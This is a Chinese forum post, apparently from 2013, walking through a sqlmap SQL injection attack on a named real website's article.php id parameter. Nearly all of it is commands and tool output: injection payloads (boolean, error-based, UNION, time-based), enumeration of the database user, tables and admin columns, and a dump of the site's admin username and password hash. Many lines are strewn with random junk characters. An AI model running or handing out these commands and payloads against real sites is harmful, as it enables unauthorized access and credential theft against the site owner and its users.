找回密码
 立即注册
查看: 3049|回复: 0
打印 上一主题 下一主题

sqlmap实例注入mysql

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 22:18:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) p& [8 I0 |& l) A" y0 f/ q6 Yms "Mysql" --current-user       /*  注解:获取当前用户名称
) t. _2 T7 f% y# _    sqlmap/0.9 - automatic SQL injection and database takeover tool
# Q( H5 W6 ~0 L$ N5 N) ^    http://sqlmap.sourceforge.net
  • starting at: 16:53:54; V. x: T. T3 [* d3 j4 \# m) \
    [16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as( ~, I6 F) P6 T) l; j+ h
    session file
    " \' @8 w. L$ ^: d$ V& ]! c[16:53:54] [INFO] resuming injection data from session file3 Q' i1 ?& C% r% x' v# W+ o- T
    [16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    9 V/ S% l2 l3 G, W5 o[16:53:54] [INFO] testing connection to the target url* U% T, w' l1 O/ B! R4 r
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque* ]) K  B9 |& ]# C) t$ L1 b
    sts:
    ; W9 X6 _; V$ A' ~---
    . m4 e% q) M' s: O8 wPlace: GET
    5 i6 {* G- P* C% u7 ]Parameter: id6 }; T# K/ w: e! @
        Type: boolean-based blind* u9 u3 ~  J5 G$ W
        Title: AND boolean-based blind - WHERE or HAVING clause
    . S" w5 y, O4 E' ~' d1 S- A    Payload: id=276 AND 799=799
    3 n* e0 w: w0 n7 y" F, h" r4 I    Type: error-based9 V, G$ M% ^) ^" Z
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ; k' j% b0 ]' x    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    7 T. {% N+ h- n% I7 ?120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    # e0 H: R7 m# ?9 F),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)7 L/ b4 u' A, j/ J" C& t3 p" C
        Type: UNION query( o5 n- \; z3 M5 h! Z
        Title: MySQL UNION query (NULL) - 1 to 10 columns7 V/ l' K& |9 |
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    5 m# M% u9 @, y(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR)," G5 _3 o) w- @, Z& i' r8 O
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    . ?5 C( L% T# g" a, X% l7 U, @. I9 q    Type: AND/OR time-based blind1 E8 i, E% M; a6 t- t
        Title: MySQL > 5.0.11 AND time-based blind
    " U( r  h7 H, G0 J  z! U- L8 ~3 ~; j2 @) h    Payload: id=276 AND SLEEP(5)- P3 d. B1 m9 Q8 Q) B6 I
    ---
    & t  C  N& E& H3 B( y+ V[16:53:55] [INFO] the back-end DBMS is MySQL: B) b. H$ O3 a# L1 l
    web server operating system: Windows# Q% \4 i3 L" a4 E; c
    web application technology: Apache 2.2.11, PHP 5.3.0
    0 B' l/ q8 U& B2 Y7 s% Cback-end DBMS: MySQL 5.0
    5 V* l3 ?! O; r) I[16:53:55] [INFO] fetching current user
    , i$ }/ U9 j) V+ R& p/ Kcurrent user:    'root@localhost'   
    " n' e  B' C0 d  [. d$ G[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou7 T3 O* d3 i% o& F2 _
    tput\www.wepost.com.hk'
  • shutting down at: 16:53:580 z3 x& q: R! a& i: |

      H6 w. O6 D$ ^' ND:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    , u. n$ ^  H1 V) qms "Mysql" --current-db                  /*当前数据库
    " G. f: k$ }  ?    sqlmap/0.9 - automatic SQL injection and database takeover tool1 b/ d& c% W1 T/ Q9 r! u8 B3 _4 Z
        http://sqlmap.sourceforge.net
  • starting at: 16:54:16
    0 U- A; Q# A' b' p5 o% W4 y6 n[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as7 p- Y$ [9 c1 }+ n$ ~% k
    session file
    7 z" e4 X8 m( m1 @/ `8 s; D: I8 f[16:54:16] [INFO] resuming injection data from session file% I* k* J& R, r. D
    [16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    / a* p: c. T: z& o% l[16:54:16] [INFO] testing connection to the target url" N+ s: i6 D7 f( G
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque2 t- s+ F# D* y4 _
    sts:% b5 z8 [4 {: R& Q1 i! z
    ---5 j0 \1 s5 V. c. {  M0 X
    Place: GET2 X7 P8 i% \2 L, [
    Parameter: id! G: v7 e( O* t
        Type: boolean-based blind
    2 e4 `( M8 R$ G    Title: AND boolean-based blind - WHERE or HAVING clause
    5 o5 r$ ]6 a  X    Payload: id=276 AND 799=799" I0 b# X4 Z% A3 W5 r9 U2 P! l
        Type: error-based/ s9 O4 d$ H& c, F
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause% j* ~# x% ^$ W& i6 d
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
    / T# B: y/ G0 g+ x5 k1 w9 @7 A* p120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
    * n' P, B- T% `),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& d. V4 e( O2 H7 H# A/ n0 U: e
        Type: UNION query
    5 w% m& A3 m: |& E  y1 |6 ^    Title: MySQL UNION query (NULL) - 1 to 10 columns& B9 V% M- m. x% a
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    & v0 u, F, Y3 U  l- T; o! |* [(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),  V# f; F; @  T# p
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    3 |! q* Q1 {! X/ _    Type: AND/OR time-based blind
    ! N  x9 r" g( U' }, c' I2 V    Title: MySQL > 5.0.11 AND time-based blind
    % y, @2 f" I. Z& t: Y& v' S    Payload: id=276 AND SLEEP(5)0 C! V5 |1 E% Q3 c+ O
    ---4 b7 ]8 |' G( T! m7 v) h; E8 a
    [16:54:17] [INFO] the back-end DBMS is MySQL" Z$ t5 U4 w1 ^5 a! V, y8 J
    web server operating system: Windows3 h$ Y- k0 Y, X2 C; _5 }
    web application technology: Apache 2.2.11, PHP 5.3.0
    * U3 Q4 o" _' K. Uback-end DBMS: MySQL 5.0: D* K5 u' c' G7 M# N  L
    [16:54:17] [INFO] fetching current database3 C3 T) E0 Y/ w( G& U4 |! R
    current database:    'wepost'
    & M: q" a/ B. O/ T1 m5 b7 m$ N[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou) I2 D" x$ K! I! Q3 R8 C
    tput\www.wepost.com.hk'
  • shutting down at: 16:54:18
    ' E$ j! q3 N/ m. C+ q9 _( }# F) BD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db# }* y, f$ r) X  m& A8 v- N: q0 \; A
    ms "Mysql" --tables  -D "wepost"         /*获取当前数据库的表名
    - w% }/ Z# z3 m    sqlmap/0.9 - automatic SQL injection and database takeover tool
    ) j2 X; W$ ]- \) D8 \    http://sqlmap.sourceforge.net
  • starting at: 16:55:25" Q% l3 x% C) ~8 E/ n, q2 |
    [16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as/ y3 q$ m( r5 r
    session file. D6 U( P4 g5 Y8 E/ I
    [16:55:25] [INFO] resuming injection data from session file/ V1 Y4 U8 R0 K1 B, T( Y# J3 G
    [16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
    . `% g7 K9 |! e5 l  l$ L[16:55:25] [INFO] testing connection to the target url5 g3 j+ P$ _" y3 c7 Y% g
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque
    , a- ^  G. L# R" X% Tsts:, F& N0 M6 Y, s1 F0 b( K
    ---
    * Q/ D2 n0 E; e1 H9 I. i- q" xPlace: GET! @/ L* h8 ?3 [
    Parameter: id
    4 {# ^* A* f' U& C( U0 s    Type: boolean-based blind& M- O9 Z1 o! J: }! x" K$ |' L2 j
        Title: AND boolean-based blind - WHERE or HAVING clause
    % ^0 X  X& A9 ^4 d" T7 K    Payload: id=276 AND 799=7998 u: G# W# J/ K' y4 b6 k" X
        Type: error-based
    3 j: ]) Y" `9 p    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause! ?" I* v# x# q
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 i% u& e/ ]! M8 M$ C- i
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 Z8 T( m& J7 o; Z& _
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)% x  `5 H+ U/ i
        Type: UNION query& }5 n- d+ T" X4 J4 P
        Title: MySQL UNION query (NULL) - 1 to 10 columns
    7 v8 b  I1 P% Q9 h- j    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR+ ~" D1 L- q$ L- z& B% \6 @0 |- _8 ]. E
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    : B2 a8 p% R, E  ?CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#) s$ R) N% i% X5 V
        Type: AND/OR time-based blind
    8 Q# V4 [# x; {! x: I6 G# D    Title: MySQL > 5.0.11 AND time-based blind+ u/ Q! x" e# _0 a* e
        Payload: id=276 AND SLEEP(5)5 q  ]0 V2 [- `! q5 l0 O
    ---) v4 I% R1 ~0 X6 j9 B
    [16:55:26] [INFO] the back-end DBMS is MySQL$ d. [! ?. O) z  |% V8 t
    web server operating system: Windows
    - a1 q2 p/ _! \  ~web application technology: Apache 2.2.11, PHP 5.3.0, ^, i3 K# U$ v2 P" L7 r3 K
    back-end DBMS: MySQL 5.02 }4 {- Y  o- O" W+ ]2 ^
    [16:55:26] [INFO] fetching tables for database 'wepost'
      J5 c5 V" G1 h* w[16:55:27] [INFO] the SQL query used returns 6 entries0 b- }7 H/ H& {7 W, `
    Database: wepost
    , d! s2 E( x# l, v! p0 d[6 tables]
    . a/ q6 O, D$ j; j  L6 t+-------------+" w  Z* O! R/ K
    | admin       |, G9 x. K/ a( n8 J1 g
    | article     |
    & b, L/ O6 r0 F. M' m1 Q. r| contributor |
    " q  t# O- w5 X  [| idea        |
    ) O' e; y3 @1 O& R| image       |+ S' J9 e; T8 \8 d7 U
    | issue       |3 s3 W1 V" Q: J( N7 v1 |
    +-------------+
    6 }# V$ E3 r; d3 i( {[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou' W* D  I/ W; Y9 \$ W
    tput\www.wepost.com.hk'
  • shutting down at: 16:55:333 F* g3 L' O3 x  c

    ; t  @# Z( G( iD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db, r2 _& J6 B- p, ?
    ms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /*获取admin表的字段名$ y( ?; z2 R1 {/ x
        sqlmap/0.9 - automatic SQL injection and database takeover tool5 e5 D; t. |4 J4 Z* G
        http://sqlmap.sourceforge.net
  • starting at: 16:56:06% @: P* [: P# H8 q5 u( V
    sqlmap identified the following injection points with a total of 0 HTTP(s) reque* s" W4 q) p; d5 `2 @  E
    sts:
    ; U+ @! ]$ ^1 G# P7 N---7 k# N5 l) N8 D9 n. `
    Place: GET) t8 J# B* t" G) f
    Parameter: id5 ?( D6 d" D. j! \# C
        Type: boolean-based blind& T" C2 v, k6 u, A
        Title: AND boolean-based blind - WHERE or HAVING clause
    9 m) V6 v; l1 b1 l9 d    Payload: id=276 AND 799=799& A; N- b# w5 p& ~; p7 L. h
        Type: error-based, f$ e: e" R, o5 O  I. z
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& T  l- Q' l, R8 C
        Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,0 E, ]9 N( v& s$ b
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58! Q& H, a$ f  L6 N5 J
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    5 ~; o8 E8 m7 S; ]  E" ]8 B    Type: UNION query
    7 o4 N# P1 s* g( @: x, i' Y; A0 B/ J    Title: MySQL UNION query (NULL) - 1 to 10 columns$ }- G) p3 l0 |( L4 V' Z. l+ i
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR2 z% }  @- K- H1 w$ [
    (58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),( D" s- c( c/ l3 m5 z/ S
    CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#& k; n/ J; \4 A( J9 l$ b1 ^5 P# T
        Type: AND/OR time-based blind$ [6 ^% \1 E$ f# h/ E% G
        Title: MySQL > 5.0.11 AND time-based blind
    ; ?" }, G+ H5 Q) P% O    Payload: id=276 AND SLEEP(5)
      l" j+ i# ?% I7 d---& l" C7 e8 \& f2 O$ z8 z
    web server operating system: Windows; ]6 ~" Y9 h" \, u9 }( u0 Z5 v/ j
    web application technology: Apache 2.2.11, PHP 5.3.0# o( Z5 u3 d0 N( y. ^1 G- \
    back-end DBMS: MySQL 5.0
    9 [2 y% @' F8 t, g3 {1 v[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
    ; D" j3 t2 C  e* E" r- Yssion': wepost, wepost& _# n, }) h+ C9 a0 `  G" n' a
    Database: wepost
    $ D7 K% C3 n! WTable: admin& G6 y: h7 ^/ V! Y
    [4 columns]
    - T1 O7 x+ b# W5 x9 C1 y+----------+-------------+
    0 P% u; Q5 X- [' u9 m$ F0 o| Column   | Type        |5 W& _6 J0 y9 O8 j" ]
    +----------+-------------+
    # Y8 a7 z. E: ^5 U) F| id       | int(11)     |) `: J% Y& z: v0 v4 e
    | password | varchar(32) |
    . N* G, f; n) u( N. ^) t6 F% x| type     | varchar(10) |
    4 A4 |0 r" k( V. O. P- v- G: \| userid   | varchar(20) |
    7 K" K9 W* P) K. h7 ]# o% I+----------+-------------+2 _8 k6 k# b8 K
  • shutting down at: 16:56:196 A5 I' R# O& w. J  F
    / ^- y5 H; E0 T4 v3 O, Y3 j6 ~
    D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
    4 T3 P. Q' h5 D9 b0 K9 r- tms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /*获取字段里面的内容7 j8 O# K! v* F6 D3 S) \: q
        sqlmap/0.9 - automatic SQL injection and database takeover tool! M+ k+ ?' Y) K2 B$ S
        http://sqlmap.sourceforge.net
  • starting at: 16:57:14
    6 U  n$ v' }: ?: X2 [# P. u& i! \9 qsqlmap identified the following injection points with a total of 0 HTTP(s) reque  u8 j  e9 h, U( n& O1 s1 \
    sts:
    0 Z# @  D9 D+ G---5 [4 z) i4 c/ g4 ]/ v/ b
    Place: GET0 R' N( q$ P5 y+ _3 J* _5 S" e
    Parameter: id
    $ T5 t2 U" L  ~- K, G! _' t+ @    Type: boolean-based blind
    5 N$ Y% f! \9 I3 i' Y0 J0 \    Title: AND boolean-based blind - WHERE or HAVING clause8 ^& t1 d+ w6 N/ p8 @
        Payload: id=276 AND 799=799% q- A! _. @1 p7 D! U& t
        Type: error-based! m2 Z1 K1 z. G8 O  X2 f
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    ! B( j0 K; I, q, r    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,5 X; t# I( s: Z; h" g- j$ U' e3 b
    120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58  n1 G. @$ D1 u6 g# s6 _& J) J6 N
    ),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    2 Z  }# \6 T' p  L! I1 O+ C    Type: UNION query
    , r$ {3 y% l6 f& [% ?; X  I9 ~    Title: MySQL UNION query (NULL) - 1 to 10 columns. D+ e7 Y( r0 n- t2 I0 d: `
        Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
    5 k, w9 h, ?7 Z* v(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
    ) |9 O7 K, Y2 J7 x; x' T) kCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    ! x  q2 b8 R( o% k/ J    Type: AND/OR time-based blind' X( q6 @& w1 B8 @' v- m  x
        Title: MySQL > 5.0.11 AND time-based blind
      w9 j) {7 x( A/ S- B# U' O/ Q5 f    Payload: id=276 AND SLEEP(5)& V* g: X% ~. _9 i
    ---6 l- o- c% |' Y, C3 I2 `- |
    web server operating system: Windows
    4 w, R5 r; a3 pweb application technology: Apache 2.2.11, PHP 5.3.0
    % @9 c: h! r$ P1 s. Oback-end DBMS: MySQL 5.0
    5 |6 m: r; |! |0 \, Precognized possible password hash values. do you want to use dictionary attack o
    - _9 L/ e' O; U3 ^0 y. ^0 an retrieved table items? [Y/n/q] y( T. }& E( D( T/ S* ~! V3 C0 |' r$ i$ R
    what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
    " e, `0 H, D* bdo you want to use common password suffixes? (slow!) [y/N] y) h- r" ~. g( U/ D( m/ v
    Database: wepost
    * x8 \) ~+ i0 mTable: admin
    . c9 V* h/ `; q  b[1 entry]+ f+ p8 c8 G9 j3 Q8 G# N2 o: R
    +----------------------------------+------------+# l* u( S. M6 z3 @- |) R# K! M$ N5 U
    | password                         | userid     |; G& N/ e8 s6 ]% z! u( y8 x
    +----------------------------------+------------+
    # p: g) r7 Y& g( F| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |& T7 e0 N% A" I3 M9 N; t! X
    +----------------------------------+------------+4 A8 \" @) G* U' B+ H2 [
  • shutting down at: 16:58:146 E" t3 g( b1 {8 a0 A5 Q7 p+ }/ E& C3 f
    - {1 u3 Q* P. n, x
    D:\Python27\sqlmap>
  • 回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    快速回复 返回顶部 返回列表